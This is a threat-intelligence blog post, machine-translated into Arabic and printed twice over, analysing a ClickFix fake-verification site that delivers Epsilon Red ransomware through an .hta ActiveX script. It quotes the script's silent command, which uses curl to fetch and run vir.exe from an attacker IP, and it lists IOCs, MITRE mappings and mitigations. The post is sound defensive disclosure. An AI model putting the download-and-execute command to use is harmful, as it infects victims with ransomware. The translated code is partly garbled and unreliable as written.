🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
ذكاء البرامج الضارة
6
mins read

تجذب الجهات الفاعلة في مجال التهديد الضحايا إلى تنزيل ملفات.HTA باستخدام ClickFix لنشر برنامج Epsilon Red Ransomware

اكتشفت CloudSek حملة Epsilon Red جديدة لبرامج الفدية تستهدف المستخدمين على مستوى العالم عبر صفحات التحقق المزيفة من ClickFix. نشط منذ يوليو 2025، ويستخدم ممثلو التهديد الهندسة الاجتماعية وينتحلون منصات مثل Discord و Twitch و OnlyFans لخداع المستخدمين لتنفيذ ملفات.HTA الضارة من خلال ActiveX. يؤدي هذا إلى تنزيل الحمولة الصامتة ونشر برامج الفدية. يتم حث المستخدمين على تعطيل ActiveX وحظر عناوين IP للمهاجمين والتدريب على مواجهة مثل هذه الإغراءات.

كلاودسك ترياد
July 25, 2025
Green Alert
Last Update posted on
August 19, 2025
المراقبة الاستباقية للويب المظلم لمؤسستك

قم بمراقبة البرامج الضارة والدفاع عنها بشكل استباقي باستخدام وحدة CloudSek xvigil Malware Logs، مما يضمن سلامة أصولك الرقمية

Schedule a Demo
Table of Contents
Author(s)
No items found.

ملخص تنفيذي

أثناء البحث الروتيني عن البنية التحتية، كشفت TRIAD من CloudSek عن تحت عنوان كليكفيكس موقع تسليم البرامج الضارة قيد التطوير النشط، المرتبط بـ إبسيلون ريد رانسوم وير. على عكس الحملات السابقة التي تنسخ الأوامر إلى الحافظات، يحث هذا البديل الضحايا على زيارة صفحة ثانوية، حيث يتم تنفيذ أوامر shell الضارة بصمت عبر اكتيف إكس لتنزيل الحمولات وتشغيلها من عنوان IP يتحكم فيه المهاجم. تُستخدم أساليب الهندسة الاجتماعية، مثل رموز التحقق المزيفة، لتبدو حميدة. كشف التمحور حول البنية التحتية ذات الصلة عن انتحال شخصية خدمات مثل روبوت ديسكورد كابتشا، ركلة، نشل، و المعجبين فقط، بالإضافة إلى السحر ذي الطابع الرومانسي. تمت ملاحظة Epsilon Red لأول مرة في عام 2021 وهي مستوحاة بشكل فضفاض من ريفيل رانسومواري في تصميم مذكرة الفدية، ولكن بخلاف ذلك تبدو متميزة في تكتيكاتها وبنيتها التحتية.

التحليل

خلال نشاطنا الروتيني للبحث عن البنية التحتية، اكتشفنا صفحة تسليم البرامج الضارة تحت عنوان clickfix كانت قيد التطوير.

عادةً، عند النقر فوق زر التحقق، يتم نسخ الأمر الضار إلى حافظة الضحية. ومع ذلك، في هذه الحالة، تم حث الضحية على فتح صفحة أخرى على نفس الموقع.

var shell = كائن نشط جديد («Wscript.shell»)؛

يسمح هذا الكائن بتنفيذ أوامر shell (cmd.exe).

تنزيل صامت وتنفيذ

shell.run («cmd /c cd /D %userprofile% &&curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe &a.exe «, 0)؛

  • cd /D %userprofile%: يقوم بالتبديل إلى الدليل الرئيسي للمستخدم.
  • curl -s -o a.exe...: يقوم بتنزيل ملف بصمت من عنوان IP وحفظه كملف a.exe.
  • a.exe: ينفذ الملف الذي تم تنزيله. [md5:98107c01ecd8b7802582d404e007e493] - أحمر إبسيلون
  • 0: يقوم بتشغيل العملية مخفي (لا توجد نافذة معروضة).

يعرض رسالة تحقق مزيفة

Shell.run («تردد cmd /c رمز التحقق الخاص بك هو: pc-19fj5e9i-cje8i3e4 وإيقاف مؤقت»)؛

  • يعرض رسالة الهندسة الاجتماعية لاختتام موضوع clickfix bait.
  • قد يكون الخطأ المطبعي («التحقق») مقصودًا ليبدو غير مهدد أو هاوي.

وقفة: تبقي نافذة CMD مفتوحة.

عند إدخال الرمز الصحيح الموضح في موجه الأوامر، تظهر الرسالة التالية في مربع الحوار.

التمحور من خلال بنيتها التحتية، لاحظنا أن الجهات الفاعلة في مجال التهديد تنتحل شخصية روبوت كابتشا الشهير (https://captcha.bot)، جنبًا إلى جنب مع مجموعة متنوعة من خدمات البث مثل Kick و Twitch و Rumble و Onlyfans وغيرها التي تقدم في الغالب حمولات Windows باستخدام Clickfix. بالإضافة إلى ذلك، تمكنا من العثور على مجموعة صغيرة من صفحات تسليم clickfix ذات الطابع الرومانسي/المواعدة والتي يديرها نفس ممثل التهديد.

الإسناد

يترك برنامج Epsilon Red ransomware، الذي تم تحديده لأول مرة في عام 2021، مذكرة فدية على أجهزة الكمبيوتر المصابة التي تشبه مذكرة ReVil ransomware، وإن كان ذلك مع تحسينات نحوية طفيفة. علاوة على ذلك، لم يتم ملاحظة أي أوجه تشابه واضحة أخرى بين Epsilon Red و ReVil ransomware.

رسم خرائط MITRE

Tactic Technique ID Description
Initial Access Phishing: Drive-by Compromise T1189 Victims are lured to themed websites (e.g., fake verification pages) where malicious scripts execute without user interaction.
Execution Command and Scripting Interpreter: Windows Command Shell T1059.003 Uses cmd.exe to execute downloaded binaries and display social engineering messages.
Execution Command and Scripting Interpreter: JavaScript/VBScript T1059.005 Malicious JavaScript (ActiveXObject("WScript.Shell")) embedded in web pages executes commands on the host.
Execution User Execution: Malicious Link T1204.001 Victims are socially engineered into clicking a malicious link and following staged instructions.
Defense Evasion Obfuscated Files or Information T1027 The payload is delivered with minimal visibility (curl -s) and executed silently (Run(..., 0)).
Defense Evasion Masquerading T1036 Use of fake verification codes and benign themes (e.g., captcha verification) to mislead users and security analysts.
Persistence (expected) Scheduled Task/Job T1053.005 Epsilon Red campaigns have historically used scheduled tasks for persistence post-execution.
Command and Control Application Layer Protocol: Web Protocols T1071.001 Uses HTTP (via curl) for payload download and possibly for follow-up C2 traffic.
Impact Data Encrypted for Impact T1486 Final-stage ransomware (Epsilon Red) encrypts victim files after initial infection.

IOC

Indicator Type Value Notes
md5 98107c01ecd8b7802582d404e007e493 Epsilon Red Ransomware
Domain twtich[.]cc Clickfix Delivery [.hta]
IP:Port 155.94.155[.]227:2269 Command and Control
md5 2db32339fa151276d5a40781bc8d5eaa Quasar RAT Malware
Domain capchabot[.]cc Clickfix Delivery [regular]
IP:Port 213.209.150[.]188:8112 Command and Control

التأثير

  • تسوية نقطة النهاية عبر متصفحات الويب: يتيح إساءة استخدام ActiveXObject تنفيذ التعليمات البرمجية عن بُعد مباشرةً من جلسات المتصفح، متجاوزًا حماية التنزيل التقليدية.
  • نشر برامج الفدية: يمكن أن يؤدي ذلك إلى تشفير كامل لبرامج الفدية يسبقه حركة جانبية.
  • انتحال هوية العلامة التجارية يقلل من شكوك المستخدم: يؤدي محاكاة خدمات Discord captcha ومنصات البث إلى زيادة احتمالية نجاح الهندسة الاجتماعية.
  • إساءة استخدام البنية التحتية المستمرة: تشير إعادة استخدام صفحات التسليم ذات الموضوعات (Clickfix، ormance lures) عبر الحملات إلى البنية التحتية التشغيلية والتخطيط على المدى الطويل.

عوامل التخفيف

  • تعطيل برنامج ActiveX ومضيف البرنامج النصي لنظام التشغيل Windows (WSH): فرض سياسات المجموعة لحظر متجهات تنفيذ البرامج النصية القديمة (WScript.shell، ActiveXObject) في جميع البيئات.
  • تكامل تغذية التهديدات وحظر IP: استوعب معلومات التهديد بشكل استباقي لإدراج عناوين IP والنطاقات المعروفة للمهاجمين في القائمة السوداء، بالإضافة إلى IOFAs (مؤشرات الهجوم المستقبلي) المرتبطة بحملات Clickfix.
  • تحليلات سلوك نقطة النهاية: نشر قواعد EDR للإبلاغ عن عمليات التنفيذ المخفية (Shell.run و cmd /c والتنزيلات الصامتة عبر curl) وإنشاء العمليات الفرعية المشبوهة من المتصفحات.
  • تدريب التوعية الأمنية: محاكاة الهجمات التي تنتحل صفة الخدمات المألوفة (مثل روبوتات Discord و Twitch) لتكييف المستخدمين ضد التفاعل مع صفحات التحقق المزيفة.

المراجع

Author

كلاودسك ترياد

قسم أبحاث التهديدات وتحليلات المعلومات في CloudSek

Predict Cyber threats against your organization

Schedule a Demo
Related Posts
No items found.

انضم إلى أكثر من 10,000 مشترك

تابع آخر الأخبار حول سلالات البرامج الضارة، وأساليب التصيد الاحتيالي،
مؤشرات التسوية وتسريب البيانات.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

CloudSEK XVigil

Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.

Learn more about XVigil
CloudSEK SVigil

Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.

Learn more about SVigil
CloudSEK SVigil

Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.

Learn more about BeVigil Ent
CloudSEK BeVigil

Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.

Learn more about BeVigil

تجذب الجهات الفاعلة في مجال التهديد الضحايا إلى تنزيل ملفات.HTA باستخدام ClickFix لنشر برنامج Epsilon Red Ransomware

اكتشفت CloudSek حملة Epsilon Red جديدة لبرامج الفدية تستهدف المستخدمين على مستوى العالم عبر صفحات التحقق المزيفة من ClickFix. نشط منذ يوليو 2025، ويستخدم ممثلو التهديد الهندسة الاجتماعية وينتحلون منصات مثل Discord و Twitch و OnlyFans لخداع المستخدمين لتنفيذ ملفات.HTA الضارة من خلال ActiveX. يؤدي هذا إلى تنزيل الحمولة الصامتة ونشر برامج الفدية. يتم حث المستخدمين على تعطيل ActiveX وحظر عناوين IP للمهاجمين والتدريب على مواجهة مثل هذه الإغراءات.
July 25, 2025
6
min
Table of Content
Example H2
Example H2

ملخص تنفيذي

أثناء البحث الروتيني عن البنية التحتية، كشفت TRIAD من CloudSek عن تحت عنوان كليكفيكس موقع تسليم البرامج الضارة قيد التطوير النشط، المرتبط بـ إبسيلون ريد رانسوم وير. على عكس الحملات السابقة التي تنسخ الأوامر إلى الحافظات، يحث هذا البديل الضحايا على زيارة صفحة ثانوية، حيث يتم تنفيذ أوامر shell الضارة بصمت عبر اكتيف إكس لتنزيل الحمولات وتشغيلها من عنوان IP يتحكم فيه المهاجم. تُستخدم أساليب الهندسة الاجتماعية، مثل رموز التحقق المزيفة، لتبدو حميدة. كشف التمحور حول البنية التحتية ذات الصلة عن انتحال شخصية خدمات مثل روبوت ديسكورد كابتشا، ركلة، نشل، و المعجبين فقط، بالإضافة إلى السحر ذي الطابع الرومانسي. تمت ملاحظة Epsilon Red لأول مرة في عام 2021 وهي مستوحاة بشكل فضفاض من ريفيل رانسومواري في تصميم مذكرة الفدية، ولكن بخلاف ذلك تبدو متميزة في تكتيكاتها وبنيتها التحتية.

التحليل

خلال نشاطنا الروتيني للبحث عن البنية التحتية، اكتشفنا صفحة تسليم البرامج الضارة تحت عنوان clickfix كانت قيد التطوير.

عادةً، عند النقر فوق زر التحقق، يتم نسخ الأمر الضار إلى حافظة الضحية. ومع ذلك، في هذه الحالة، تم حث الضحية على فتح صفحة أخرى على نفس الموقع.

var shell = كائن نشط جديد («Wscript.shell»)؛

يسمح هذا الكائن بتنفيذ أوامر shell (cmd.exe).

تنزيل صامت وتنفيذ

shell.run («cmd /c cd /D %userprofile% &&curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe &a.exe «, 0)؛

  • cd /D %userprofile%: يقوم بالتبديل إلى الدليل الرئيسي للمستخدم.
  • curl -s -o a.exe...: يقوم بتنزيل ملف بصمت من عنوان IP وحفظه كملف a.exe.
  • a.exe: ينفذ الملف الذي تم تنزيله. [md5:98107c01ecd8b7802582d404e007e493] - أحمر إبسيلون
  • 0: يقوم بتشغيل العملية مخفي (لا توجد نافذة معروضة).

يعرض رسالة تحقق مزيفة

Shell.run («تردد cmd /c رمز التحقق الخاص بك هو: pc-19fj5e9i-cje8i3e4 وإيقاف مؤقت»)؛

  • يعرض رسالة الهندسة الاجتماعية لاختتام موضوع clickfix bait.
  • قد يكون الخطأ المطبعي («التحقق») مقصودًا ليبدو غير مهدد أو هاوي.

وقفة: تبقي نافذة CMD مفتوحة.

عند إدخال الرمز الصحيح الموضح في موجه الأوامر، تظهر الرسالة التالية في مربع الحوار.

التمحور من خلال بنيتها التحتية، لاحظنا أن الجهات الفاعلة في مجال التهديد تنتحل شخصية روبوت كابتشا الشهير (https://captcha.bot)، جنبًا إلى جنب مع مجموعة متنوعة من خدمات البث مثل Kick و Twitch و Rumble و Onlyfans وغيرها التي تقدم في الغالب حمولات Windows باستخدام Clickfix. بالإضافة إلى ذلك، تمكنا من العثور على مجموعة صغيرة من صفحات تسليم clickfix ذات الطابع الرومانسي/المواعدة والتي يديرها نفس ممثل التهديد.

الإسناد

يترك برنامج Epsilon Red ransomware، الذي تم تحديده لأول مرة في عام 2021، مذكرة فدية على أجهزة الكمبيوتر المصابة التي تشبه مذكرة ReVil ransomware، وإن كان ذلك مع تحسينات نحوية طفيفة. علاوة على ذلك، لم يتم ملاحظة أي أوجه تشابه واضحة أخرى بين Epsilon Red و ReVil ransomware.

رسم خرائط MITRE

Tactic Technique ID Description
Initial Access Phishing: Drive-by Compromise T1189 Victims are lured to themed websites (e.g., fake verification pages) where malicious scripts execute without user interaction.
Execution Command and Scripting Interpreter: Windows Command Shell T1059.003 Uses cmd.exe to execute downloaded binaries and display social engineering messages.
Execution Command and Scripting Interpreter: JavaScript/VBScript T1059.005 Malicious JavaScript (ActiveXObject("WScript.Shell")) embedded in web pages executes commands on the host.
Execution User Execution: Malicious Link T1204.001 Victims are socially engineered into clicking a malicious link and following staged instructions.
Defense Evasion Obfuscated Files or Information T1027 The payload is delivered with minimal visibility (curl -s) and executed silently (Run(..., 0)).
Defense Evasion Masquerading T1036 Use of fake verification codes and benign themes (e.g., captcha verification) to mislead users and security analysts.
Persistence (expected) Scheduled Task/Job T1053.005 Epsilon Red campaigns have historically used scheduled tasks for persistence post-execution.
Command and Control Application Layer Protocol: Web Protocols T1071.001 Uses HTTP (via curl) for payload download and possibly for follow-up C2 traffic.
Impact Data Encrypted for Impact T1486 Final-stage ransomware (Epsilon Red) encrypts victim files after initial infection.

IOC

Indicator Type Value Notes
md5 98107c01ecd8b7802582d404e007e493 Epsilon Red Ransomware
Domain twtich[.]cc Clickfix Delivery [.hta]
IP:Port 155.94.155[.]227:2269 Command and Control
md5 2db32339fa151276d5a40781bc8d5eaa Quasar RAT Malware
Domain capchabot[.]cc Clickfix Delivery [regular]
IP:Port 213.209.150[.]188:8112 Command and Control

التأثير

  • تسوية نقطة النهاية عبر متصفحات الويب: يتيح إساءة استخدام ActiveXObject تنفيذ التعليمات البرمجية عن بُعد مباشرةً من جلسات المتصفح، متجاوزًا حماية التنزيل التقليدية.
  • نشر برامج الفدية: يمكن أن يؤدي ذلك إلى تشفير كامل لبرامج الفدية يسبقه حركة جانبية.
  • انتحال هوية العلامة التجارية يقلل من شكوك المستخدم: يؤدي محاكاة خدمات Discord captcha ومنصات البث إلى زيادة احتمالية نجاح الهندسة الاجتماعية.
  • إساءة استخدام البنية التحتية المستمرة: تشير إعادة استخدام صفحات التسليم ذات الموضوعات (Clickfix، ormance lures) عبر الحملات إلى البنية التحتية التشغيلية والتخطيط على المدى الطويل.

عوامل التخفيف

  • تعطيل برنامج ActiveX ومضيف البرنامج النصي لنظام التشغيل Windows (WSH): فرض سياسات المجموعة لحظر متجهات تنفيذ البرامج النصية القديمة (WScript.shell، ActiveXObject) في جميع البيئات.
  • تكامل تغذية التهديدات وحظر IP: استوعب معلومات التهديد بشكل استباقي لإدراج عناوين IP والنطاقات المعروفة للمهاجمين في القائمة السوداء، بالإضافة إلى IOFAs (مؤشرات الهجوم المستقبلي) المرتبطة بحملات Clickfix.
  • تحليلات سلوك نقطة النهاية: نشر قواعد EDR للإبلاغ عن عمليات التنفيذ المخفية (Shell.run و cmd /c والتنزيلات الصامتة عبر curl) وإنشاء العمليات الفرعية المشبوهة من المتصفحات.
  • تدريب التوعية الأمنية: محاكاة الهجمات التي تنتحل صفة الخدمات المألوفة (مثل روبوتات Discord و Twitch) لتكييف المستخدمين ضد التفاعل مع صفحات التحقق المزيفة.

المراجع

كلاودسك ترياد
قسم أبحاث التهديدات وتحليلات المعلومات في CloudSek

Related Blogs

No items found.